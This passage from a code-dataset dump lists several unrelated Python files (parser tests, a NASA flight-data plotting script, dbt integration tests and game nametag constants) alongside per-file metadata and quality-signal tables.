#result = quad(integrand,np.log(1.+cosmo.z_start),np.log(1.+cosmo.z_end), args=(cosmo,kwargs))
r_dict = {}
r_dict['value']=result[0]
r_dict['err'] = result[1]
return r_dict
````

avg_line_length: 35.964286, max_line_length: 187, alphanum_fraction: 0.667825

| quality signal | value | flag |
|---|---|---|
| qsc_code_num_words | 998 | 0 |
| qsc_code_num_chars | 6,042 | 0 |
| qsc_code_mean_word_length | 3.776553 | 0 |
| qsc_code_frac_words_unique | 0.144289 | null |
| qsc_code_frac_chars_top_2grams | 0.068984 | 0 |
| qsc_code_frac_chars_top_3grams | 0.106129 | 0 |
| qsc_code_frac_chars_top_4grams | 0.035023 | 0 |
| qsc_code_frac_chars_dupe_5grams | 0.850093 | 1 |
| qsc_code_frac_chars_dupe_6grams | 0.801008 | 1 |
| qsc_code_frac_chars_dupe_7grams | 0.768374 | 1 |
| qsc_code_frac_chars_dupe_8grams | 0.768374 | 1 |
| qsc_code_frac_chars_dupe_9grams | 0.768374 | 1 |
| qsc_code_frac_chars_dupe_10grams | 0.750862 | 1 |
| qsc_code_frac_chars_replacement_symbols | 0 | 0 |
| qsc_code_frac_chars_digital | 0.048756 | 0 |
| qsc_code_frac_chars_whitespace | 0.181893 | 0 |
| qsc_code_size_file_byte | 6,042 | 0 |
| qsc_code_num_lines | 167 | 0 |
| qsc_code_num_chars_line_max | 188 | 0 |
| qsc_code_num_chars_line_mean | 36.179641 | 0 |
| qsc_code_frac_chars_alphabet | 0.713737 | 0 |
| qsc_code_frac_chars_comments | 0.217643 | 0 |
| qsc_code_cate_xml_start | 0 | 0 |
| qsc_code_frac_lines_dupe_lines | 0.708333 | 1 |
| qsc_code_cate_autogen | 0 | 0 |
| qsc_code_frac_lines_long_string | 0 | 0 |
| qsc_code_frac_chars_string_length | 0.007248 | 0 |
| qsc_code_frac_chars_long_word_length | 0 | 0 |
| qsc_code_frac_lines_string_concat | 0 | null |
| qsc_code_cate_encoded_data | 0 | 0 |
| qsc_code_frac_chars_hex_words | 0 | 0 |
| qsc_code_frac_lines_prompt_comments | 0 | 0 |
| qsc_code_frac_lines_assert | 0 | 0 |
| qsc_codepython_cate_ast | 1 | 0 |
| qsc_codepython_frac_lines_func_ratio | 0.15 | 0 |
| qsc_codepython_cate_var_zero | false | 0 |
| qsc_codepython_frac_lines_pass | 0 | 0 |
| qsc_codepython_frac_lines_import | 0.016667 | 0 |
| qsc_codepython_frac_lines_simplefunc | 0.058333 | 0 |
| qsc_codepython_score_lines_no_logic | 0.316667 | 0 |
| qsc_codepython_frac_lines_print | 0 | 0 |

effective: 0, hits: 7
**Row 3**

| field | value |
|---|---|
| hexsha | 9171b2fc399f821fc1417f6dc4dc653c5c0c1b5e |
| size | 986 |
| ext | py |
| lang | Python |
| repo_path (stars/issues/forks) | tests/test_eolterm.py |
| repo_name (stars/issues/forks) | bitranox/Arpeggio |
| repo_head_hexsha (stars/issues/forks) | 62151cb8ef2cfe5113a4388da09892e7714c5e96 |
| repo_licenses (stars/issues/forks) | ["MIT"] |

| event group | count | event_min_datetime | event_max_datetime |
|---|---|---|---|
| max_stars | null | null | null |
| max_issues | null | null | null |
| max_forks | null | null | null |

content:

````python
# stdlib
from typing import Any
# proj
from arpeggio import *
def test_zeroormore_eolterm() -> None:
def grammar() -> Any: return first, second, EOF
def first() -> Any: return ZeroOrMore(["a", "b"], eolterm=True)
def second() -> Any: return "a"
# first rule should match only first line
# so that second rule will match "a" on the new line
input = """a a b a b b
a"""
parser = ParserPython(grammar, reduce_tree=False)
result = parser.parse(input)
assert result
def test_oneormore_eolterm() -> None:
def grammar() -> Any: return first, second, EOF
def first() -> Any: return OneOrMore(["a", "b"], eolterm=True)
def second() -> Any: return "a"
# first rule should match only first line
# so that second rule will match "a" on the new line
input = """a a a b a
a"""
parser = ParserPython(grammar, reduce_tree=False)
result = parser.parse(input)
assert result
````

avg_line_length: 24.65, max_line_length: 74, alphanum_fraction: 0.612576

| quality signal | value | flag |
|---|---|---|
| qsc_code_num_words | 136 | 0 |
| qsc_code_num_chars | 986 | 0 |
| qsc_code_mean_word_length | 4.397059 | 0 |
| qsc_code_frac_words_unique | 0.301471 | null |
| qsc_code_frac_chars_top_2grams | 0.090301 | 0 |
| qsc_code_frac_chars_top_3grams | 0.046823 | 0 |
| qsc_code_frac_chars_top_4grams | 0.070234 | 0 |
| qsc_code_frac_chars_dupe_5grams | 0.822742 | 1 |
| qsc_code_frac_chars_dupe_6grams | 0.822742 | 1 |
| qsc_code_frac_chars_dupe_7grams | 0.822742 | 1 |
| qsc_code_frac_chars_dupe_8grams | 0.822742 | 1 |
| qsc_code_frac_chars_dupe_9grams | 0.822742 | 1 |
| qsc_code_frac_chars_dupe_10grams | 0.822742 | 1 |
| qsc_code_frac_chars_replacement_symbols | 0 | 0 |
| qsc_code_frac_chars_digital | 0 | 0 |
| qsc_code_frac_chars_whitespace | 0.272819 | 0 |
| qsc_code_size_file_byte | 986 | 0 |
| qsc_code_num_lines | 39 | 0 |
| qsc_code_num_chars_line_max | 75 | 0 |
| qsc_code_num_chars_line_mean | 25.282051 | 0 |
| qsc_code_frac_chars_alphabet | 0.834031 | 0 |
| qsc_code_frac_chars_comments | 0.19574 | 0 |
| qsc_code_cate_xml_start | 0 | 0 |
| qsc_code_frac_lines_dupe_lines | 0.6 | 0 |
| qsc_code_cate_autogen | 0 | 0 |
| qsc_code_frac_lines_long_string | 0 | 0 |
| qsc_code_frac_chars_string_length | 0.049618 | 0 |
| qsc_code_frac_chars_long_word_length | 0 | 0 |
| qsc_code_frac_lines_string_concat | 0 | null |
| qsc_code_cate_encoded_data | 0 | 0 |
| qsc_code_frac_chars_hex_words | 0 | 0 |
| qsc_code_frac_lines_prompt_comments | 0 | 0 |
| qsc_code_frac_lines_assert | 0.1 | 0 |
| qsc_codepython_cate_ast | 1 | 0 |
| qsc_codepython_frac_lines_func_ratio | 0.4 | 1 |
| qsc_codepython_cate_var_zero | false | 0 |
| qsc_codepython_frac_lines_pass | 0 | 0 |
| qsc_codepython_frac_lines_import | 0.1 | 0 |
| qsc_codepython_frac_lines_simplefunc | 0.3 | 1 |
| qsc_codepython_score_lines_no_logic | 0.5 | 0 |
| qsc_codepython_frac_lines_print | 0 | 0 |

effective: 0, hits: 8
**Row 4**

| field | value |
|---|---|
| hexsha | 91a349e24c7a5127eb7503afd39e8a1d63dde772 |
| size | 4,306 |
| ext | py |
| lang | Python |
| repo_path (stars/issues/forks) | python/impacts.py |
| repo_name (stars/issues/forks) | alexkenan/nasa_impacts |
| repo_head_hexsha (stars/issues/forks) | cfd9dc823bfe93fd13874137f38c212ad343a483 |
| repo_licenses (stars/issues/forks) | ["MIT"] |

| event group | count | event_min_datetime | event_max_datetime |
|---|---|---|---|
| max_stars | null | null | null |
| max_issues | null | null | null |
| max_forks | null | null | null |

content:

````python
#!/usr/bin/env python3
#####################################
# LAST UPDATED 09 MAR 2021 #
#####################################
"""
Use Plotly for aircraft data analysis. Data from
https://catalog.data.gov/dataset/p-3-meteorological-and-navigation-data-impacts-v1
https://catalog.data.gov/dataset/er-2-navigation-data-impacts-v1
"""
import plotly.graph_objects as go
import pandas as pd
list_of_files = [
'https://raw.githubusercontent.com/alexkenan/nasa_impacts/main/datasets/IMPACTS_MetNav_ER2_20200115_R0.csv',
'https://raw.githubusercontent.com/alexkenan/nasa_impacts/main/datasets/IMPACTS_MetNav_ER2_20200118_R0.csv',
'https://raw.githubusercontent.com/alexkenan/nasa_impacts/main/datasets/IMPACTS_MetNav_ER2_20200125_R0.csv',
'https://raw.githubusercontent.com/alexkenan/nasa_impacts/main/datasets/IMPACTS_MetNav_ER2_20200201_R0.csv',
'https://raw.githubusercontent.com/alexkenan/nasa_impacts/main/datasets/IMPACTS_MetNav_ER2_20200205_R0.csv',
'https://raw.githubusercontent.com/alexkenan/nasa_impacts/main/datasets/IMPACTS_MetNav_ER2_20200207_R0.csv',
'https://raw.githubusercontent.com/alexkenan/nasa_impacts/main/datasets/IMPACTS_MetNav_ER2_20200223_R0.csv',
'https://raw.githubusercontent.com/alexkenan/nasa_impacts/main/datasets/IMPACTS_MetNav_ER2_20200225_R0.csv',
'https://raw.githubusercontent.com/alexkenan/nasa_impacts/main/datasets/IMPACTS_MetNav_ER2_20200227_R0.csv',
'https://raw.githubusercontent.com/alexkenan/nasa_impacts/main/datasets/IMPACTS_MetNav_ER2_20200302_R0.csv',
'https://raw.githubusercontent.com/alexkenan/nasa_impacts/main/datasets/IMPACTS_MetNav_P3B_20200112_R0.csv',
'https://raw.githubusercontent.com/alexkenan/nasa_impacts/main/datasets/IMPACTS_MetNav_P3B_20200118_R0.csv',
'https://raw.githubusercontent.com/alexkenan/nasa_impacts/main/datasets/IMPACTS_MetNav_P3B_20200125_R0.csv',
'https://raw.githubusercontent.com/alexkenan/nasa_impacts/main/datasets/IMPACTS_MetNav_P3B_20200201_R0.csv',
'https://raw.githubusercontent.com/alexkenan/nasa_impacts/main/datasets/IMPACTS_MetNav_P3B_20200205_R0.csv',
'https://raw.githubusercontent.com/alexkenan/nasa_impacts/main/datasets/IMPACTS_MetNav_P3B_20200207_R0.csv',
'https://raw.githubusercontent.com/alexkenan/nasa_impacts/main/datasets/IMPACTS_MetNav_P3B_20200213_R0.csv',
'https://raw.githubusercontent.com/alexkenan/nasa_impacts/main/datasets/IMPACTS_MetNav_P3B_20200218_R0.csv',
'https://raw.githubusercontent.com/alexkenan/nasa_impacts/main/datasets/IMPACTS_MetNav_P3B_20200220_R0.csv',
'https://raw.githubusercontent.com/alexkenan/nasa_impacts/main/datasets/IMPACTS_MetNav_P3B_20200224_R0.csv',
'https://raw.githubusercontent.com/alexkenan/nasa_impacts/main/datasets/IMPACTS_MetNav_P3B_20200225_R0.csv']
for i in range(len(list_of_files)):
df = pd.read_csv(list_of_files[i])
# next two lines are necessary to eliminate position data errors
df['Longitude'] = df['Longitude'].replace(-9999.0, None)
df['Latitude'] = df['Latitude'].replace(-9999.0, None)
fig = go.Figure()
counter = 30
fig.add_trace(go.Scattermapbox(mode="lines", lat=df['Latitude'].dropna(),
lon=df['Longitude'].dropna(), showlegend=False,
line={'color': 'gray'},
name=""))
fig.add_trace(go.Scattermapbox(mode="markers+lines", lon=df['Longitude'].head(counter).dropna(),
lat=df['Latitude'].head(counter).dropna(),
showlegend=True,
marker={'size': 6, 'color': 'blue'},
name="Start"))
fig.add_trace(go.Scattermapbox(mode="markers+lines", lon=df['Longitude'].tail(counter).dropna(),
lat=df['Latitude'].tail(counter).dropna(),
showlegend=True,
marker={'size': 6, 'color': 'red'},
name="End"))
fig.update_layout(
margin={'l': 0, 't': 0, 'b': 0, 'r': 0},
mapbox={'center': {'lon': -100, 'lat': 40},
'style': "carto-positron",
'zoom': 3},
geo_scope="usa")
fig.show()
````

avg_line_length: 64.268657, max_line_length: 112, alphanum_fraction: 0.678356

| quality signal | value | flag |
|---|---|---|
| qsc_code_num_words | 523 | 0 |
| qsc_code_num_chars | 4,306 | 0 |
| qsc_code_mean_word_length | 5.359465 | 0 |
| qsc_code_frac_words_unique | 0.256214 | null |
| qsc_code_frac_chars_top_2grams | 0.059936 | 0 |
| qsc_code_frac_chars_top_3grams | 0.187299 | 1 |
| qsc_code_frac_chars_top_4grams | 0.209775 | 1 |
| qsc_code_frac_chars_dupe_5grams | 0.752051 | 0 |
| qsc_code_frac_chars_dupe_6grams | 0.714948 | 1 |
| qsc_code_frac_chars_dupe_7grams | 0.704245 | 1 |
| qsc_code_frac_chars_dupe_8grams | 0.704245 | 1 |
| qsc_code_frac_chars_dupe_9grams | 0.673564 | 0 |
| qsc_code_frac_chars_dupe_10grams | 0.673564 | 1 |
| qsc_code_frac_chars_replacement_symbols | 0 | 0 |
| qsc_code_frac_chars_digital | 0.068378 | 0 |
| qsc_code_frac_chars_whitespace | 0.167905 | 0 |
| qsc_code_size_file_byte | 4,306 | 0 |
| qsc_code_num_lines | 66 | 0 |
| qsc_code_num_chars_line_max | 113 | 0 |
| qsc_code_num_chars_line_mean | 65.242424 | 0 |
| qsc_code_frac_chars_alphabet | 0.713927 | 0 |
| qsc_code_frac_chars_comments | 0.073386 | 0 |
| qsc_code_cate_xml_start | 0 | 0 |
| qsc_code_frac_lines_dupe_lines | 0.039216 | 0 |
| qsc_code_cate_autogen | 0 | 0 |
| qsc_code_frac_lines_long_string | 0 | 0 |
| qsc_code_frac_chars_string_length | 0.616035 | 1 |
| qsc_code_frac_chars_long_word_length | 0 | 0 |
| qsc_code_frac_lines_string_concat | 0 | null |
| qsc_code_cate_encoded_data | 0 | 0 |
| qsc_code_frac_chars_hex_words | 0 | 0 |
| qsc_code_frac_lines_prompt_comments | 0 | 0 |
| qsc_code_frac_lines_assert | 0 | 0 |
| qsc_codepython_cate_ast | 1 | 0 |
| qsc_codepython_frac_lines_func_ratio | 0 | 0 |
| qsc_codepython_cate_var_zero | false | 0 |
| qsc_codepython_frac_lines_pass | 0 | 0 |
| qsc_codepython_frac_lines_import | 0.039216 | 0 |
| qsc_codepython_frac_lines_simplefunc | 0 | 0 |
| qsc_codepython_score_lines_no_logic | 0.039216 | 0 |
| qsc_codepython_frac_lines_print | 0 | 0 |

effective: 0, hits: 7
**Row 5**

| field | value |
|---|---|
| hexsha | 91b9336b12d3de59143975de19db4fed8c23a8d8 |
| size | 7,830 |
| ext | py |
| lang | Python |
| repo_path (stars/issues/forks) | test/integration/003_simple_reference_test/test_simple_reference.py |
| repo_name (stars/issues/forks) | managedbyq/q-dbt |
| repo_head_hexsha (stars/issues/forks) | 01f1918fe5cbf3036b7197b8e3211960403718f3 |
| repo_licenses (stars/issues/forks) | ["Apache-2.0"] |

| event group | count | event_min_datetime | event_max_datetime |
|---|---|---|---|
| max_stars | 1 | 2021-01-28T16:40:37.000Z | 2021-01-28T16:40:37.000Z |
| max_issues | null | null | null |
| max_forks | null | null | null |

content:

````python
from nose.plugins.attrib import attr
from test.integration.base import DBTIntegrationTest
class TestSimpleReference(DBTIntegrationTest):
def setUp(self):
pass
@property
def schema(self):
return "simple_reference_003"
@property
def models(self):
return "test/integration/003_simple_reference_test/models"
@attr(type='postgres')
def test__postgres__simple_reference(self):
self.use_default_project()
self.use_profile('postgres')
self.run_sql_file("test/integration/003_simple_reference_test/seed.sql")
self.run_dbt()
# Copies should match
self.assertTablesEqual("seed","incremental_copy")
self.assertTablesEqual("seed","materialized_copy")
self.assertTablesEqual("seed","view_copy")
# Summaries should match
self.assertTablesEqual("summary_expected","incremental_summary")
self.assertTablesEqual("summary_expected","materialized_summary")
self.assertTablesEqual("summary_expected","view_summary")
self.assertTablesEqual("summary_expected","ephemeral_summary")
self.run_sql_file("test/integration/003_simple_reference_test/update.sql")
self.run_dbt()
# Copies should match
self.assertTablesEqual("seed","incremental_copy")
self.assertTablesEqual("seed","materialized_copy")
self.assertTablesEqual("seed","view_copy")
# Summaries should match
self.assertTablesEqual("summary_expected","incremental_summary")
self.assertTablesEqual("summary_expected","materialized_summary")
self.assertTablesEqual("summary_expected","view_summary")
self.assertTablesEqual("summary_expected","ephemeral_summary")
@attr(type='snowflake')
def test__snowflake__simple_reference(self):
self.use_default_project()
self.use_profile('snowflake')
self.run_sql_file("test/integration/003_simple_reference_test/seed.sql")
self.run_dbt()
# Copies should match
self.assertTablesEqual("seed","incremental_copy")
self.assertTablesEqual("seed","materialized_copy")
self.assertTablesEqual("seed","view_copy")
# Summaries should match
self.assertTablesEqual("summary_expected","incremental_summary")
self.assertTablesEqual("summary_expected","materialized_summary")
self.assertTablesEqual("summary_expected","view_summary")
self.assertTablesEqual("summary_expected","ephemeral_summary")
self.run_sql_file("test/integration/003_simple_reference_test/update.sql")
self.run_dbt()
# Copies should match
self.assertTablesEqual("seed","incremental_copy")
self.assertTablesEqual("seed","materialized_copy")
self.assertTablesEqual("seed","view_copy")
# Summaries should match
self.assertTablesEqual("summary_expected","incremental_summary")
self.assertTablesEqual("summary_expected","materialized_summary")
self.assertTablesEqual("summary_expected","view_summary")
self.assertTablesEqual("summary_expected","ephemeral_summary")
@attr(type='postgres')
def test__postgres__simple_reference_with_models(self):
self.use_default_project()
self.use_profile('postgres')
self.run_sql_file("test/integration/003_simple_reference_test/seed.sql")
# Run materialized_copy, ephemeral_copy, and their dependents
# ephemeral_copy should not actually be materialized b/c it is ephemeral
self.run_dbt(['run', '--models', 'materialized_copy', 'ephemeral_copy'])
# Copies should match
self.assertTablesEqual("seed","materialized_copy")
created_models = self.get_models_in_schema()
self.assertTrue('materialized_copy' in created_models)
@attr(type='postgres')
def test__postgres__simple_reference_with_models_and_children(self):
self.use_default_project()
self.use_profile('postgres')
self.run_sql_file("test/integration/003_simple_reference_test/seed.sql")
# Run materialized_copy, ephemeral_copy, and their dependents
# ephemeral_copy should not actually be materialized b/c it is ephemeral
# the dependent ephemeral_summary, however, should be materialized as a table
self.run_dbt(['run', '--models', 'materialized_copy+', 'ephemeral_copy+'])
# Copies should match
self.assertTablesEqual("seed","materialized_copy")
# Summaries should match
self.assertTablesEqual("summary_expected","materialized_summary")
self.assertTablesEqual("summary_expected","ephemeral_summary")
created_models = self.get_models_in_schema()
self.assertFalse('incremental_copy' in created_models)
self.assertFalse('incremental_summary' in created_models)
self.assertFalse('view_copy' in created_models)
self.assertFalse('view_summary' in created_models)
# make sure this wasn't errantly materialized
self.assertFalse('ephemeral_copy' in created_models)
self.assertTrue('materialized_copy' in created_models)
self.assertTrue('materialized_summary' in created_models)
self.assertEqual(created_models['materialized_copy'], 'table')
self.assertEqual(created_models['materialized_summary'], 'table')
self.assertTrue('ephemeral_summary' in created_models)
self.assertEqual(created_models['ephemeral_summary'], 'table')
@attr(type='snowflake')
def test__snowflake__simple_reference_with_models(self):
self.use_default_project()
self.use_profile('snowflake')
self.run_sql_file("test/integration/003_simple_reference_test/seed.sql")
# Run materialized_copy & ephemeral_copy
# ephemeral_copy should not actually be materialized b/c it is ephemeral
self.run_dbt(['run', '--models', 'materialized_copy', 'ephemeral_copy'])
# Copies should match
self.assertTablesEqual("seed","materialized_copy")
created_models = self.get_models_in_schema()
self.assertTrue('materialized_copy' in created_models)
@attr(type='snowflake')
def test__snowflake__simple_reference_with_models_and_children(self):
self.use_default_project()
self.use_profile('snowflake')
self.run_sql_file("test/integration/003_simple_reference_test/seed.sql")
# Run materialized_copy, ephemeral_copy, and their dependents
# ephemeral_copy should not actually be materialized b/c it is ephemeral
# the dependent ephemeral_summary, however, should be materialized as a table
self.run_dbt(['run', '--models', 'materialized_copy+', 'ephemeral_copy+'])
# Copies should match
self.assertTablesEqual("seed","materialized_copy")
# Summaries should match
self.assertTablesEqual("summary_expected","materialized_summary")
self.assertTablesEqual("summary_expected","ephemeral_summary")
created_models = self.get_models_in_schema()
self.assertFalse('incremental_copy' in created_models)
self.assertFalse('incremental_summary' in created_models)
self.assertFalse('view_copy' in created_models)
self.assertFalse('view_summary' in created_models)
# make sure this wasn't errantly materialized
self.assertFalse('ephemeral_copy' in created_models)
self.assertTrue('materialized_copy' in created_models)
self.assertTrue('materialized_summary' in created_models)
self.assertEqual(created_models['materialized_copy'], 'table')
self.assertEqual(created_models['materialized_summary'], 'table')
self.assertTrue('ephemeral_summary' in created_models)
self.assertEqual(created_models['ephemeral_summary'], 'table')
````

avg_line_length: 41.648936, max_line_length: 85, alphanum_fraction: 0.716092

| quality signal | value | flag |
|---|---|---|
| qsc_code_num_words | 848 | 0 |
| qsc_code_num_chars | 7,830 | 0 |
| qsc_code_mean_word_length | 6.311321 | 0 |
| qsc_code_frac_words_unique | 0.091981 | null |
| qsc_code_frac_chars_top_2grams | 0.141256 | 0 |
| qsc_code_frac_chars_top_3grams | 0.104634 | 0 |
| qsc_code_frac_chars_top_4grams | 0.134529 | 0 |
| qsc_code_frac_chars_dupe_5grams | 0.961136 | 1 |
| qsc_code_frac_chars_dupe_6grams | 0.961136 | 1 |
| qsc_code_frac_chars_dupe_7grams | 0.954223 | 1 |
| qsc_code_frac_chars_dupe_8grams | 0.954223 | 1 |
| qsc_code_frac_chars_dupe_9grams | 0.949552 | 1 |
| qsc_code_frac_chars_dupe_10grams | 0.942638 | 1 |
| qsc_code_frac_chars_replacement_symbols | 0 | 0 |
| qsc_code_frac_chars_digital | 0.004694 | 0 |
| qsc_code_frac_chars_whitespace | 0.18378 | 0 |
| qsc_code_size_file_byte | 7,830 | 0 |
| qsc_code_num_lines | 187 | 0 |
| qsc_code_num_chars_line_max | 86 | 0 |
| qsc_code_num_chars_line_mean | 41.871658 | 0 |
| qsc_code_frac_chars_alphabet | 0.832734 | 0 |
| qsc_code_frac_chars_comments | 0.132822 | 0 |
| qsc_code_cate_xml_start | 0 | 0 |
| qsc_code_frac_lines_dupe_lines | 0.869565 | 1 |
| qsc_code_cate_autogen | 0 | 0 |
| qsc_code_frac_lines_long_string | 0 | 0 |
| qsc_code_frac_chars_string_length | 0.316575 | 0 |
| qsc_code_frac_chars_long_word_length | 0.068165 | 0 |
| qsc_code_frac_lines_string_concat | 0 | null |
| qsc_code_cate_encoded_data | 0 | 0 |
| qsc_code_frac_chars_hex_words | 0 | 0 |
| qsc_code_frac_lines_prompt_comments | 0 | 0 |
| qsc_code_frac_lines_assert | 0.521739 | 1 |
| qsc_codepython_cate_ast | 1 | 0 |
| qsc_codepython_frac_lines_func_ratio | 0.078261 | 0 |
| qsc_codepython_cate_var_zero | false | 0 |
| qsc_codepython_frac_lines_pass | 0.008696 | 0 |
| qsc_codepython_frac_lines_import | 0.017391 | 0 |
| qsc_codepython_frac_lines_simplefunc | 0.017391 | 0 |
| qsc_codepython_score_lines_no_logic | 0.121739 | 0 |
| qsc_codepython_frac_lines_print | 0 | 0 |

effective: 0, hits: 8
**Row 6**

| field | value |
|---|---|
| hexsha | 91bda6558bb7a508cf12d3c70684c8ef05f1f0ee |
| size | 7,520 |
| ext | py |
| lang | Python |
| repo_path (stars/issues/forks) | v2.5.7/otp/nametag/NametagConstants.py |
| repo_name (stars/issues/forks) | TTOFFLINE-LEAK/ttoffline |
| repo_head_hexsha (stars/issues/forks) | bb0e91704a755d34983e94288d50288e46b68380 |
| repo_licenses (stars/issues/forks) | ["MIT"] |

| event group | count | event_min_datetime | event_max_datetime |
|---|---|---|---|
| max_stars | 4 | 2019-07-01T15:46:43.000Z | 2021-07-23T16:26:48.000Z |
| max_issues | 1 | 2019-06-29T03:40:05.000Z | 2021-06-13T01:15:16.000Z |
| max_forks | 4 | 2019-07-28T21:18:46.000Z | 2021-02-25T06:37:25.000Z |

content:

````python
CFSpeech = 1
CFThought = 2
CFQuicktalker = 4
CFTimeout = 8
CFPageButton = 16
CFQuitButton = 32
CFReversed = 64
CFSndOpenchat = 128
CFNoQuitButton = 256
CFExclaim = 512
CCNormal = 0
CCNoChat = 1
CCNonPlayer = 2
CCSuit = 3
CCToonBuilding = 4
CCSuitBuilding = 5
CCHouseBuilding = 6
CCSpeedChat = 7
CCFreeChat = 8
NAMETAG_COLORS = {CCNormal: (
(
(0.3, 0.3, 0.7, 1.0), (0.8, 0.8, 0.8, 0.5),
(0.0, 0.0, 0.0, 1.0), (1.0, 1.0, 1.0, 1.0)),
(
(0.3, 0.3, 0.7, 1.0), (0.2, 0.2, 0.2, 0.6),
(1.0, 0.5, 0.5, 1.0), (1.0, 1.0, 1.0, 1.0)),
(
(0.5, 0.5, 1.0, 1.0), (1.0, 1.0, 1.0, 1.0),
(0.0, 0.6, 0.6, 1.0), (1.0, 1.0, 1.0, 1.0)),
(
(0.3, 0.3, 0.7, 1.0), (0.8, 0.8, 0.8, 0.5),
(0.0, 0.0, 0.0, 1.0), (1.0, 1.0, 1.0, 1.0))),
CCNoChat: (
(
(0.6, 0.4, 0.2, 1.0), (0.8, 0.8, 0.8, 0.5),
(0.0, 0.0, 0.0, 1.0), (1.0, 1.0, 1.0, 1.0)),
(
(0.6, 0.4, 0.2, 1.0), (0.2, 0.2, 0.2, 0.6),
(1.0, 0.5, 0.5, 1.0), (1.0, 1.0, 1.0, 1.0)),
(
(0.8, 0.6, 0.4, 1.0), (1.0, 1.0, 1.0, 1.0),
(0.0, 0.6, 0.6, 1.0), (1.0, 1.0, 1.0, 1.0)),
(
(0.6, 0.4, 0.2, 1.0), (0.8, 0.8, 0.8, 0.5),
(0.0, 0.0, 0.0, 1.0), (1.0, 1.0, 1.0, 1.0))),
CCNonPlayer: (
(
(0.6, 0.4, 0.2, 1.0), (0.8, 0.8, 0.8, 0.5),
(0.0, 0.0, 0.0, 1.0), (1.0, 1.0, 1.0, 1.0)),
(
(0.6, 0.4, 0.2, 1.0), (0.8, 0.8, 0.8, 0.5),
(0.0, 0.0, 0.0, 1.0), (1.0, 1.0, 1.0, 1.0)),
(
(0.6, 0.4, 0.2, 1.0), (0.8, 0.8, 0.8, 0.5),
(0.0, 0.0, 0.0, 1.0), (1.0, 1.0, 1.0, 1.0)),
(
(0.6, 0.4, 0.2, 1.0), (0.8, 0.8, 0.8, 0.5),
(0.0, 0.0, 0.0, 1.0), (1.0, 1.0, 1.0, 1.0))),
CCSuit: (
(
(0.0, 0.0, 0.0, 1.0), (0.8, 0.8, 0.8, 0.5),
(0.0, 0.0, 0.0, 1.0), (1.0, 1.0, 1.0, 1.0)),
(
(0.0, 0.0, 0.0, 1.0), (0.2, 0.2, 0.2, 0.6),
(1.0, 0.5, 0.5, 1.0), (1.0, 1.0, 1.0, 1.0)),
(
(0.2, 0.2, 0.2, 1.0), (1.0, 1.0, 1.0, 0.7),
(0.0, 0.6, 0.6, 1.0), (1.0, 1.0, 1.0, 1.0)),
(
(0.0, 0.0, 0.0, 1.0), (0.8, 0.8, 0.8, 0.5),
(0.0, 0.0, 0.0, 1.0), (1.0, 1.0, 1.0, 1.0))),
CCSuitBuilding: (
(
(0.5, 0.5, 0.5, 1.0), (0.8, 0.8, 0.8, 0.5),
(0.0, 0.0, 0.0, 1.0), (1.0, 1.0, 1.0, 1.0)),
(
(0.5, 0.5, 0.5, 1.0), (0.8, 0.8, 0.8, 0.5),
(1.0, 0.5, 0.5, 1.0), (1.0, 1.0, 1.0, 1.0)),
(
(0.5, 0.5, 0.5, 1.0), (0.8, 0.8, 0.8, 0.5),
(0.0, 0.6, 0.6, 1.0), (1.0, 1.0, 1.0, 1.0)),
(
(0.5, 0.5, 0.5, 1.0), (0.8, 0.8, 0.8, 0.5),
(0.0, 0.0, 0.0, 1.0), (1.0, 1.0, 1.0, 1.0))),
CCToonBuilding: (
(
(0.2, 0.6, 0.9, 1.0), (0.8, 0.8, 0.8, 0.5),
(0.0, 0.0, 0.0, 1.0), (1.0, 1.0, 1.0, 1.0)),
(
(0.2, 0.6, 0.9, 1.0), (0.8, 0.8, 0.8, 0.5),
(0.0, 0.0, 0.0, 1.0), (1.0, 1.0, 1.0, 1.0)),
(
(0.2, 0.6, 0.9, 1.0), (0.8, 0.8, 0.8, 0.5),
(0.0, 0.0, 0.0, 1.0), (1.0, 1.0, 1.0, 1.0)),
(
(0.2, 0.6, 0.9, 1.0), (0.8, 0.8, 0.8, 0.5),
(0.0, 0.0, 0.0, 1.0), (1.0, 1.0, 1.0, 1.0))),
CCHouseBuilding: (
(
(0.2, 0.6, 0.9, 1.0), (0.8, 0.8, 0.8, 0.5),
(0.0, 0.0, 0.0, 1.0), (1.0, 1.0, 1.0, 1.0)),
(
(0.2, 0.6, 0.9, 1.0), (0.8, 0.8, 0.8, 0.5),
(1.0, 0.5, 0.5, 1.0), (1.0, 1.0, 1.0, 1.0)),
(
(0.2, 0.6, 0.9, 1.0), (0.8, 0.8, 0.8, 0.5),
(0.0, 0.6, 0.6, 1.0), (1.0, 1.0, 1.0, 1.0)),
(
(0.0, 0.6, 0.2, 1.0), (0.8, 0.8, 0.8, 0.5),
(0.0, 0.0, 0.0, 1.0), (1.0, 1.0, 1.0, 1.0))),
CCSpeedChat: (
(
(0.0, 0.6, 0.2, 1.0), (0.8, 0.8, 0.8, 0.5),
(0.0, 0.0, 0.0, 1.0), (1.0, 1.0, 1.0, 1.0)),
(
(0.0, 0.5, 0.0, 1.0), (0.5, 0.5, 0.5, 0.6),
(1.0, 0.5, 0.5, 1.0), (1.0, 1.0, 1.0, 1.0)),
(
(0.0, 0.7, 0.2, 1.0), (1.0, 1.0, 1.0, 0.7),
(0.0, 0.6, 0.6, 1.0), (1.0, 1.0, 1.0, 1.0)),
(
(0.0, 0.6, 0.2, 1.0), (0.8, 0.8, 0.8, 0.5),
(0.0, 0.0, 0.0, 1.0), (1.0, 1.0, 1.0, 1.0))),
CCFreeChat: (
(
(0.3, 0.3, 0.7, 1.0), (0.8, 0.8, 0.8, 0.5),
(0.0, 0.0, 0.0, 1.0), (1.0, 1.0, 1.0, 1.0)),
(
(0.2, 0.2, 0.5, 1.0), (0.2, 0.2, 0.2, 0.6),
(1.0, 0.5, 0.5, 1.0), (1.0, 1.0, 1.0, 1.0)),
(
(0.5, 0.5, 1.0, 1.0), (1.0, 1.0, 1.0, 1.0),
(0.0, 0.6, 0.6, 1.0), (1.0, 1.0, 1.0, 1.0)),
(
(0.3, 0.3, 0.7, 1.0), (0.8, 0.8, 0.8, 0.5),
(0.0, 0.0, 0.0, 1.0), (1.0, 1.0, 1.0, 1.0)))}
ARROW_COLORS = {CCSuit: (0.8, 0.4, 0.0, 1.0),
CCNonPlayer: (0.8, 0.4, 0.0, 1.0),
CCNoChat: (0.8, 0.4, 0.0, 1.0)}
DEFAULT_WORDWRAPS = {CCNormal: 7.5,
CCNoChat: 7.5,
CCNonPlayer: 7.5,
CCSuit: 7.5,
CCToonBuilding: 8.5,
CCSuitBuilding: 8.5,
CCHouseBuilding: 10.0,
CCSpeedChat: 7.5,
CCFreeChat: 7.5}
WTNormal = 0
WTQuickTalker = 1
